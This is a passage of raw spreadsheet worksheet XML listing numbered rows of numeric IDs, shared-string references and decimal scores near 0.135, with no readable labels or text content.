        <v>22188</v>
      </c>
      <c r="F23452" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="23453" ht="15.75" customHeight="1">
      <c r="A23453" s="1">
        <v>33586.0</v>
      </c>
      <c r="B23453" s="2">
        <v>8325486.0</v>
      </c>
      <c r="C23453" s="2" t="s">
        <v>22621</v>
      </c>
      <c r="D23453" s="2">
        <v>1.0</v>
      </c>
      <c r="E23453" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23453" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="23454" ht="15.75" customHeight="1">
      <c r="A23454" s="1">
        <v>22851.0</v>
      </c>
      <c r="B23454" s="2">
        <v>4.6985342E7</v>
      </c>
      <c r="C23454" s="2" t="s">
        <v>22622</v>
      </c>
      <c r="D23454" s="2">
        <v>1.0</v>
      </c>
      <c r="E23454" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23454" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="23455" ht="15.75" customHeight="1">
      <c r="A23455" s="1">
        <v>33152.0</v>
      </c>
      <c r="B23455" s="2">
        <v>7073032.0</v>
      </c>
      <c r="C23455" s="2" t="s">
        <v>22623</v>
      </c>
      <c r="D23455" s="2">
        <v>1.0</v>
      </c>
      <c r="E23455" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23455" s="2">
        <v>0.1375227686703097</v>
      </c>
    </row>
    <row r="23456" ht="15.75" customHeight="1">
      <c r="A23456" s="1">
        <v>16713.0</v>
      </c>
      <c r="B23456" s="2">
        <v>4.7434662E7</v>
      </c>
      <c r="C23456" s="2" t="s">
        <v>22624</v>
      </c>
      <c r="D23456" s="2">
        <v>1.0</v>
      </c>
      <c r="E23456" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23456" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="23457" ht="15.75" customHeight="1">
      <c r="A23457" s="1">
        <v>34137.0</v>
      </c>
      <c r="B23457" s="2">
        <v>9793192.0</v>
      </c>
      <c r="C23457" s="2" t="s">
        <v>22625</v>
      </c>
      <c r="D23457" s="2">
        <v>1.0</v>
      </c>
      <c r="E23457" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23457" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="23458" ht="15.75" customHeight="1">
      <c r="A23458" s="1">
        <v>26768.0</v>
      </c>
      <c r="B23458" s="2">
        <v>1.8487892E7</v>
      </c>
      <c r="C23458" s="2" t="s">
        <v>22626</v>
      </c>
      <c r="D23458" s="2">
        <v>1.0</v>
      </c>
      <c r="E23458" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23458" s="2">
        <v>0.1373873873873875</v>
      </c>
    </row>
    <row r="23459" ht="15.75" customHeight="1">
      <c r="A23459" s="1">
        <v>26535.0</v>
      </c>
      <c r="B23459" s="2">
        <v>1.7710399E7</v>
      </c>
      <c r="C23459" s="2" t="s">
        <v>22627</v>
      </c>
      <c r="D23459" s="2">
        <v>1.0</v>
      </c>
      <c r="E23459" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23459" s="2">
        <v>0.1373873873873874</v>
      </c>
    </row>
    <row r="23460" ht="15.75" customHeight="1">
      <c r="A23460" s="1">
        <v>24699.0</v>
      </c>
      <c r="B23460" s="2">
        <v>1.1644885E7</v>
      </c>
      <c r="C23460" s="2" t="s">
        <v>22628</v>
      </c>
      <c r="D23460" s="2">
        <v>1.0</v>
      </c>
      <c r="E23460" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23460" s="2">
        <v>0.1372053872053872</v>
      </c>
    </row>
    <row r="23461" ht="15.75" customHeight="1">
      <c r="A23461" s="1">
        <v>32999.0</v>
      </c>
      <c r="B23461" s="2">
        <v>6615466.0</v>
      </c>
      <c r="C23461" s="2" t="s">
        <v>22629</v>
      </c>
      <c r="D23461" s="2">
        <v>1.0</v>
      </c>
      <c r="E23461" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23461" s="2">
        <v>0.1372053872053872</v>
      </c>
    </row>
    <row r="23462" ht="15.75" customHeight="1">
      <c r="A23462" s="1">
        <v>31306.0</v>
      </c>
      <c r="B23462" s="2">
        <v>4967863.0</v>
      </c>
      <c r="C23462" s="2" t="s">
        <v>22630</v>
      </c>
      <c r="D23462" s="2">
        <v>1.0</v>
      </c>
      <c r="E23462" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23462" s="2">
        <v>0.1370967741935484</v>
      </c>
    </row>
    <row r="23463" ht="15.75" customHeight="1">
      <c r="A23463" s="1">
        <v>33801.0</v>
      </c>
      <c r="B23463" s="2">
        <v>8823269.0</v>
      </c>
      <c r="C23463" s="2" t="s">
        <v>22631</v>
      </c>
      <c r="D23463" s="2">
        <v>1.0</v>
      </c>
      <c r="E23463" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23463" s="2">
        <v>0.1370967741935484</v>
      </c>
    </row>
    <row r="23464" ht="15.75" customHeight="1">
      <c r="A23464" s="1">
        <v>20158.0</v>
      </c>
      <c r="B23464" s="2">
        <v>1.027601E7</v>
      </c>
      <c r="C23464" s="2" t="s">
        <v>22598</v>
      </c>
      <c r="D23464" s="2">
        <v>1.0</v>
      </c>
      <c r="E23464" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23464" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="23465" ht="15.75" customHeight="1">
      <c r="A23465" s="1">
        <v>21277.0</v>
      </c>
      <c r="B23465" s="2">
        <v>2.0262984E7</v>
      </c>
      <c r="C23465" s="2" t="s">
        <v>22632</v>
      </c>
      <c r="D23465" s="2">
        <v>1.0</v>
      </c>
      <c r="E23465" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23465" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="23466" ht="15.75" customHeight="1">
      <c r="A23466" s="1">
        <v>22613.0</v>
      </c>
      <c r="B23466" s="2">
        <v>3.9977659E7</v>
      </c>
      <c r="C23466" s="2" t="s">
        <v>22633</v>
      </c>
      <c r="D23466" s="2">
        <v>1.0</v>
      </c>
      <c r="E23466" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23466" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="23467" ht="15.75" customHeight="1">
      <c r="A23467" s="1">
        <v>23973.0</v>
      </c>
      <c r="B23467" s="2">
        <v>9068676.0</v>
      </c>
      <c r="C23467" s="2" t="s">
        <v>22634</v>
      </c>
      <c r="D23467" s="2">
        <v>1.0</v>
      </c>
      <c r="E23467" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23467" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="23468" ht="15.75" customHeight="1">
      <c r="A23468" s="1">
        <v>25474.0</v>
      </c>
      <c r="B23468" s="2">
        <v>1.4006083E7</v>
      </c>
      <c r="C23468" s="2" t="s">
        <v>22635</v>
      </c>
      <c r="D23468" s="2">
        <v>1.0</v>
      </c>
      <c r="E23468" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23468" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="23469" ht="15.75" customHeight="1">
      <c r="A23469" s="1">
        <v>28904.0</v>
      </c>
      <c r="B23469" s="2">
        <v>2.939114E7</v>
      </c>
      <c r="C23469" s="2" t="s">
        <v>22556</v>
      </c>
      <c r="D23469" s="2">
        <v>1.0</v>
      </c>
      <c r="E23469" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23469" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="23470" ht="15.75" customHeight="1">
      <c r="A23470" s="1">
        <v>30828.0</v>
      </c>
      <c r="B23470" s="2">
        <v>4541322.0</v>
      </c>
      <c r="C23470" s="2" t="s">
        <v>22636</v>
      </c>
      <c r="D23470" s="2">
        <v>1.0</v>
      </c>
      <c r="E23470" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23470" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="23471" ht="15.75" customHeight="1">
      <c r="A23471" s="1">
        <v>21520.0</v>
      </c>
      <c r="B23471" s="2">
        <v>2.3276254E7</v>
      </c>
      <c r="C23471" s="2" t="s">
        <v>22637</v>
      </c>
      <c r="D23471" s="2">
        <v>1.0</v>
      </c>
      <c r="E23471" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23471" s="2">
        <v>0.1368312757201646</v>
      </c>
    </row>
    <row r="23472" ht="15.75" customHeight="1">
      <c r="A23472" s="1">
        <v>25318.0</v>
      </c>
      <c r="B23472" s="2">
        <v>1.3439676E7</v>
      </c>
      <c r="C23472" s="2" t="s">
        <v>22638</v>
      </c>
      <c r="D23472" s="2">
        <v>1.0</v>
      </c>
      <c r="E23472" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23472" s="2">
        <v>0.13668430335097</v>
      </c>
    </row>
    <row r="23473" ht="15.75" customHeight="1">
      <c r="A23473" s="1">
        <v>21199.0</v>
      </c>
      <c r="B23473" s="2">
        <v>1.946724E7</v>
      </c>
      <c r="C23473" s="2" t="s">
        <v>22639</v>
      </c>
      <c r="D23473" s="2">
        <v>1.0</v>
      </c>
      <c r="E23473" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23473" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="23474" ht="15.75" customHeight="1">
      <c r="A23474" s="1">
        <v>32310.0</v>
      </c>
      <c r="B23474" s="2">
        <v>5.5660889E7</v>
      </c>
      <c r="C23474" s="2" t="s">
        <v>22607</v>
      </c>
      <c r="D23474" s="2">
        <v>1.0</v>
      </c>
      <c r="E23474" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23474" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="23475" ht="15.75" customHeight="1">
      <c r="A23475" s="1">
        <v>32488.0</v>
      </c>
      <c r="B23475" s="2">
        <v>5.7006194E7</v>
      </c>
      <c r="C23475" s="2" t="s">
        <v>22640</v>
      </c>
      <c r="D23475" s="2">
        <v>1.0</v>
      </c>
      <c r="E23475" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23475" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="23476" ht="15.75" customHeight="1">
      <c r="A23476" s="1">
        <v>33297.0</v>
      </c>
      <c r="B23476" s="2">
        <v>7483774.0</v>
      </c>
      <c r="C23476" s="2" t="s">
        <v>22641</v>
      </c>
      <c r="D23476" s="2">
        <v>1.0</v>
      </c>
      <c r="E23476" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23476" s="2">
        <v>0.1365348399246705</v>
      </c>
    </row>
    <row r="23477" ht="15.75" customHeight="1">
      <c r="A23477" s="1">
        <v>23073.0</v>
      </c>
      <c r="B23477" s="2">
        <v>5.0486609E7</v>
      </c>
      <c r="C23477" s="2" t="s">
        <v>22642</v>
      </c>
      <c r="D23477" s="2">
        <v>1.0</v>
      </c>
      <c r="E23477" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23477" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="23478" ht="15.75" customHeight="1">
      <c r="A23478" s="1">
        <v>33926.0</v>
      </c>
      <c r="B23478" s="2">
        <v>9281656.0</v>
      </c>
      <c r="C23478" s="2" t="s">
        <v>22643</v>
      </c>
      <c r="D23478" s="2">
        <v>1.0</v>
      </c>
      <c r="E23478" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23478" s="2">
        <v>0.1365348399246704</v>
      </c>
    </row>
    <row r="23479" ht="15.75" customHeight="1">
      <c r="A23479" s="1">
        <v>14196.0</v>
      </c>
      <c r="B23479" s="2">
        <v>3.8205987E7</v>
      </c>
      <c r="C23479" s="2" t="s">
        <v>22644</v>
      </c>
      <c r="D23479" s="2">
        <v>1.0</v>
      </c>
      <c r="E23479" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23479" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="23480" ht="15.75" customHeight="1">
      <c r="A23480" s="1">
        <v>22124.0</v>
      </c>
      <c r="B23480" s="2">
        <v>3.099725E7</v>
      </c>
      <c r="C23480" s="2" t="s">
        <v>22645</v>
      </c>
      <c r="D23480" s="2">
        <v>1.0</v>
      </c>
      <c r="E23480" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23480" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="23481" ht="15.75" customHeight="1">
      <c r="A23481" s="1">
        <v>28511.0</v>
      </c>
      <c r="B23481" s="2">
        <v>2.6749857E7</v>
      </c>
      <c r="C23481" s="2" t="s">
        <v>22646</v>
      </c>
      <c r="D23481" s="2">
        <v>1.0</v>
      </c>
      <c r="E23481" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23481" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="23482" ht="15.75" customHeight="1">
      <c r="A23482" s="1">
        <v>28778.0</v>
      </c>
      <c r="B23482" s="2">
        <v>2.844023E7</v>
      </c>
      <c r="C23482" s="2" t="s">
        <v>22647</v>
      </c>
      <c r="D23482" s="2">
        <v>1.0</v>
      </c>
      <c r="E23482" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23482" s="2">
        <v>0.1361111111111112</v>
      </c>
    </row>
    <row r="23483" ht="15.75" customHeight="1">
      <c r="A23483" s="1">
        <v>19034.0</v>
      </c>
      <c r="B23483" s="2">
        <v>5.4559929E7</v>
      </c>
      <c r="C23483" s="2" t="s">
        <v>22648</v>
      </c>
      <c r="D23483" s="2">
        <v>1.0</v>
      </c>
      <c r="E23483" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23483" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="23484" ht="15.75" customHeight="1">
      <c r="A23484" s="1">
        <v>21180.0</v>
      </c>
      <c r="B23484" s="2">
        <v>1.9192318E7</v>
      </c>
      <c r="C23484" s="2" t="s">
        <v>22649</v>
      </c>
      <c r="D23484" s="2">
        <v>1.0</v>
      </c>
      <c r="E23484" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23484" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="23485" ht="15.75" customHeight="1">
      <c r="A23485" s="1">
        <v>22621.0</v>
      </c>
      <c r="B23485" s="2">
        <v>4.0084329E7</v>
      </c>
      <c r="C23485" s="2" t="s">
        <v>22650</v>
      </c>
      <c r="D23485" s="2">
        <v>1.0</v>
      </c>
      <c r="E23485" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23485" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="23486" ht="15.75" customHeight="1">
      <c r="A23486" s="1">
        <v>23326.0</v>
      </c>
      <c r="B23486" s="2">
        <v>5.4522268E7</v>
      </c>
      <c r="C23486" s="2" t="s">
        <v>22651</v>
      </c>
      <c r="D23486" s="2">
        <v>1.0</v>
      </c>
      <c r="E23486" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23486" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="23487" ht="15.75" customHeight="1">
      <c r="A23487" s="1">
        <v>24304.0</v>
      </c>
      <c r="B23487" s="2">
        <v>1.0572475E7</v>
      </c>
      <c r="C23487" s="2" t="s">
        <v>22652</v>
      </c>
      <c r="D23487" s="2">
        <v>1.0</v>
      </c>
      <c r="E23487" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23487" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="23488" ht="15.75" customHeight="1">
      <c r="A23488" s="1">
        <v>26416.0</v>
      </c>
      <c r="B23488" s="2">
        <v>1.7141075E7</v>
      </c>
      <c r="C23488" s="2" t="s">
        <v>22653</v>
      </c>
      <c r="D23488" s="2">
        <v>1.0</v>
      </c>
      <c r="E23488" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23488" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="23489" ht="15.75" customHeight="1">
      <c r="A23489" s="1">
        <v>30512.0</v>
      </c>
      <c r="B23489" s="2">
        <v>4.0084328E7</v>
      </c>
      <c r="C23489" s="2" t="s">
        <v>22650</v>
      </c>
      <c r="D23489" s="2">
        <v>1.0</v>
      </c>
      <c r="E23489" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23489" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="23490" ht="15.75" customHeight="1">
      <c r="A23490" s="1">
        <v>33305.0</v>
      </c>
      <c r="B23490" s="2">
        <v>7503359.0</v>
      </c>
      <c r="C23490" s="2" t="s">
        <v>22654</v>
      </c>
      <c r="D23490" s="2">
        <v>1.0</v>
      </c>
      <c r="E23490" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23490" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="23491" ht="15.75" customHeight="1">
      <c r="A23491" s="1">
        <v>33654.0</v>
      </c>
      <c r="B23491" s="2">
        <v>8398850.0</v>
      </c>
      <c r="C23491" s="2" t="s">
        <v>22655</v>
      </c>
      <c r="D23491" s="2">
        <v>1.0</v>
      </c>
      <c r="E23491" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23491" s="2">
        <v>0.1359126984126984</v>
      </c>
    </row>
    <row r="23492" ht="15.75" customHeight="1">
      <c r="A23492" s="1">
        <v>18600.0</v>
      </c>
      <c r="B23492" s="2">
        <v>5.3275868E7</v>
      </c>
      <c r="C23492" s="2" t="s">
        <v>22656</v>
      </c>
      <c r="D23492" s="2">
        <v>1.0</v>
      </c>
      <c r="E23492" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23492" s="2">
        <v>0.1357243319268636</v>
      </c>
    </row>
    <row r="23493" ht="15.75" customHeight="1">
      <c r="A23493" s="1">
        <v>29792.0</v>
      </c>
      <c r="B23493" s="2">
        <v>3.5062275E7</v>
      </c>
      <c r="C23493" s="2" t="s">
        <v>22657</v>
      </c>
      <c r="D23493" s="2">
        <v>1.0</v>
      </c>
      <c r="E23493" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23493" s="2">
        <v>0.1357243319268636</v>
      </c>
    </row>
    <row r="23494" ht="15.75" customHeight="1">
      <c r="A23494" s="1">
        <v>30858.0</v>
      </c>
      <c r="B23494" s="2">
        <v>4.6177106E7</v>
      </c>
      <c r="C23494" s="2" t="s">
        <v>22658</v>
      </c>
      <c r="D23494" s="2">
        <v>1.0</v>
      </c>
      <c r="E23494" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23494" s="2">
        <v>0.1355218855218855</v>
      </c>
    </row>
    <row r="23495" ht="15.75" customHeight="1">
      <c r="A23495" s="1">
        <v>32352.0</v>
      </c>
      <c r="B23495" s="2">
        <v>5.5932823E7</v>
      </c>
      <c r="C23495" s="2" t="s">
        <v>22659</v>
      </c>
      <c r="D23495" s="2">
        <v>1.0</v>
      </c>
      <c r="E23495" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23495" s="2">
        <v>0.1355218855218855</v>
      </c>
    </row>
    <row r="23496" ht="15.75" customHeight="1">
      <c r="A23496" s="1">
        <v>33228.0</v>
      </c>
      <c r="B23496" s="2">
        <v>7270758.0</v>
      </c>
      <c r="C23496" s="2" t="s">
        <v>22660</v>
      </c>
      <c r="D23496" s="2">
        <v>1.0</v>
      </c>
      <c r="E23496" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23496" s="2">
        <v>0.1355218855218855</v>
      </c>
    </row>
    <row r="23497" ht="15.75" customHeight="1">
      <c r="A23497" s="1">
        <v>19831.0</v>
      </c>
      <c r="B23497" s="2">
        <v>5.7048533E7</v>
      </c>
      <c r="C23497" s="2" t="s">
        <v>22661</v>
      </c>
      <c r="D23497" s="2">
        <v>1.0</v>
      </c>
      <c r="E23497" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23497" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="23498" ht="15.75" customHeight="1">
      <c r="A23498" s="1">
        <v>23156.0</v>
      </c>
      <c r="B23498" s="2">
        <v>5187702.0</v>
      </c>
      <c r="C23498" s="2" t="s">
        <v>22662</v>
      </c>
      <c r="D23498" s="2">
        <v>1.0</v>
      </c>
      <c r="E23498" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23498" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="23499" ht="15.75" customHeight="1">
      <c r="A23499" s="1">
        <v>29109.0</v>
      </c>
      <c r="B23499" s="2">
        <v>3.043397E7</v>
      </c>
      <c r="C23499" s="2" t="s">
        <v>22663</v>
      </c>
      <c r="D23499" s="2">
        <v>1.0</v>
      </c>
      <c r="E23499" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23499" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="23500" ht="15.75" customHeight="1">
      <c r="A23500" s="1">
        <v>25310.0</v>
      </c>
      <c r="B23500" s="2">
        <v>1.3426884E7</v>
      </c>
      <c r="C23500" s="2" t="s">
        <v>22664</v>
      </c>
      <c r="D23500" s="2">
        <v>1.0</v>
      </c>
      <c r="E23500" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23500" s="2">
        <v>0.1353677621283255</v>
      </c>
    </row>
    <row r="23501" ht="15.75" customHeight="1">
      <c r="A23501" s="1">
        <v>360.0</v>
      </c>
      <c r="B23501" s="2">
        <v>1.6123184E7</v>
      </c>
      <c r="C23501" s="2" t="s">
        <v>22665</v>
      </c>
      <c r="D23501" s="2">
        <v>1.0</v>
      </c>
      <c r="E23501" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23501" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="23502" ht="15.75" customHeight="1">
      <c r="A23502" s="1">
        <v>20328.0</v>
      </c>
      <c r="B23502" s="2">
        <v>1.150157E7</v>
      </c>
      <c r="C23502" s="2" t="s">
        <v>22666</v>
      </c>
      <c r="D23502" s="2">
        <v>1.0</v>
      </c>
      <c r="E23502" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23502" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="23503" ht="15.75" customHeight="1">
      <c r="A23503" s="1">
        <v>22161.0</v>
      </c>
      <c r="B23503" s="2">
        <v>3.1434452E7</v>
      </c>
      <c r="C23503" s="2" t="s">
        <v>22667</v>
      </c>
      <c r="D23503" s="2">
        <v>1.0</v>
      </c>
      <c r="E23503" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23503" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="23504" ht="15.75" customHeight="1">
      <c r="A23504" s="1">
        <v>24651.0</v>
      </c>
      <c r="B23504" s="2">
        <v>1.1501569E7</v>
      </c>
      <c r="C23504" s="2" t="s">
        <v>22668</v>
      </c>
      <c r="D23504" s="2">
        <v>1.0</v>
      </c>
      <c r="E23504" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23504" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="23505" ht="15.75" customHeight="1">
      <c r="A23505" s="1">
        <v>29345.0</v>
      </c>
      <c r="B23505" s="2">
        <v>3.1434451E7</v>
      </c>
      <c r="C23505" s="2" t="s">
        <v>22667</v>
      </c>
      <c r="D23505" s="2">
        <v>1.0</v>
      </c>
      <c r="E23505" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23505" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="23506" ht="15.75" customHeight="1">
      <c r="A23506" s="1">
        <v>21524.0</v>
      </c>
      <c r="B23506" s="2">
        <v>2.3318632E7</v>
      </c>
      <c r="C23506" s="2" t="s">
        <v>22669</v>
      </c>
      <c r="D23506" s="2">
        <v>1.0</v>
      </c>
      <c r="E23506" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23506" s="2">
        <v>0.1351575456053069</v>
      </c>
    </row>
    <row r="23507" ht="15.75" customHeight="1">
      <c r="A23507" s="1">
        <v>21869.0</v>
      </c>
      <c r="B23507" s="2">
        <v>2.7480808E7</v>
      </c>
      <c r="C23507" s="2" t="s">
        <v>22670</v>
      </c>
      <c r="D23507" s="2">
        <v>1.0</v>
      </c>
      <c r="E23507" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23507" s="2">
        <v>0.1350574712643679</v>
      </c>
    </row>
    <row r="23508" ht="15.75" customHeight="1">
      <c r="A23508" s="1">
        <v>26009.0</v>
      </c>
      <c r="B23508" s="2">
        <v>1.5339366E7</v>
      </c>
      <c r="C23508" s="2" t="s">
        <v>22671</v>
      </c>
      <c r="D23508" s="2">
        <v>1.0</v>
      </c>
      <c r="E23508" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23508" s="2">
        <v>0.1350574712643679</v>
      </c>
    </row>
    <row r="23509" ht="15.75" customHeight="1">
      <c r="A23509" s="1">
        <v>27867.0</v>
      </c>
      <c r="B23509" s="2">
        <v>2.3524837E7</v>
      </c>
      <c r="C23509" s="2" t="s">
        <v>22672</v>
      </c>
      <c r="D23509" s="2">
        <v>1.0</v>
      </c>
      <c r="E23509" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23509" s="2">
        <v>0.1350574712643679</v>
      </c>
    </row>
    <row r="23510" ht="15.75" customHeight="1">
      <c r="A23510" s="1">
        <v>31395.0</v>
      </c>
      <c r="B23510" s="2">
        <v>4.9992928E7</v>
      </c>
      <c r="C23510" s="2" t="s">
        <v>22673</v>
      </c>
      <c r="D23510" s="2">
        <v>1.0</v>
      </c>
      <c r="E23510" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23510" s="2">
        <v>0.1350574712643679</v>
      </c>
    </row>
    <row r="23511" ht="15.75" customHeight="1">
      <c r="A23511" s="1">
        <v>10568.0</v>
      </c>
      <c r="B23511" s="2">
        <v>1.2896002E7</v>
      </c>
      <c r="C23511" s="2" t="s">
        <v>22674</v>
      </c>
      <c r="D23511" s="2">
        <v>1.0</v>
      </c>
      <c r="E23511" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23511" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="23512" ht="15.75" customHeight="1">
      <c r="A23512" s="1">
        <v>20322.0</v>
      </c>
      <c r="B23512" s="2">
        <v>1.1478974E7</v>
      </c>
      <c r="C23512" s="2" t="s">
        <v>22675</v>
      </c>
      <c r="D23512" s="2">
        <v>1.0</v>
      </c>
      <c r="E23512" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23512" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="23513" ht="15.75" customHeight="1">
      <c r="A23513" s="1">
        <v>16797.0</v>
      </c>
      <c r="B23513" s="2">
        <v>4.7777989E7</v>
      </c>
      <c r="C23513" s="2" t="s">
        <v>22676</v>
      </c>
      <c r="D23513" s="2">
        <v>1.0</v>
      </c>
      <c r="E23513" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23513" s="2">
        <v>0.1348039215686275</v>
      </c>
    </row>
    <row r="23514" ht="15.75" customHeight="1">
      <c r="A23514" s="1">
        <v>32139.0</v>
      </c>
      <c r="B23514" s="2">
        <v>5420606.0</v>
      </c>
      <c r="C23514" s="2" t="s">
        <v>22677</v>
      </c>
      <c r="D23514" s="2">
        <v>1.0</v>
      </c>
      <c r="E23514" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23514" s="2">
        <v>0.1348039215686275</v>
      </c>
    </row>
    <row r="23515" ht="15.75" customHeight="1">
      <c r="A23515" s="1">
        <v>27806.0</v>
      </c>
      <c r="B23515" s="2">
        <v>2.3276253E7</v>
      </c>
      <c r="C23515" s="2" t="s">
        <v>22637</v>
      </c>
      <c r="D23515" s="2">
        <v>1.0</v>
      </c>
      <c r="E23515" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23515" s="2">
        <v>0.1347736625514403</v>
      </c>
    </row>
    <row r="23516" ht="15.75" customHeight="1">
      <c r="A23516" s="1">
        <v>25519.0</v>
      </c>
      <c r="B23516" s="2">
        <v>1.4209547E7</v>
      </c>
      <c r="C23516" s="2" t="s">
        <v>22678</v>
      </c>
      <c r="D23516" s="2">
        <v>1.0</v>
      </c>
      <c r="E23516" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23516" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="23517" ht="15.75" customHeight="1">
      <c r="A23517" s="1">
        <v>33256.0</v>
      </c>
      <c r="B23517" s="2">
        <v>7361667.0</v>
      </c>
      <c r="C23517" s="2" t="s">
        <v>22679</v>
      </c>
      <c r="D23517" s="2">
        <v>1.0</v>
      </c>
      <c r="E23517" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23517" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="23518" ht="15.75" customHeight="1">
      <c r="A23518" s="1">
        <v>34223.0</v>
      </c>
      <c r="B23518" s="2">
        <v>4.5153495E7</v>
      </c>
      <c r="C23518" s="2" t="s">
        <v>22680</v>
      </c>
      <c r="D23518" s="2">
        <v>1.0</v>
      </c>
      <c r="E23518" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23518" s="2">
        <v>0.1343178621659635</v>
      </c>
    </row>
    <row r="23519" ht="15.75" customHeight="1">
      <c r="A23519" s="1">
        <v>19402.0</v>
      </c>
      <c r="B23519" s="2">
        <v>5.5578897E7</v>
      </c>
      <c r="C23519" s="2" t="s">
        <v>22681</v>
      </c>
      <c r="D23519" s="2">
        <v>1.0</v>
      </c>
      <c r="E23519" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23519" s="2">
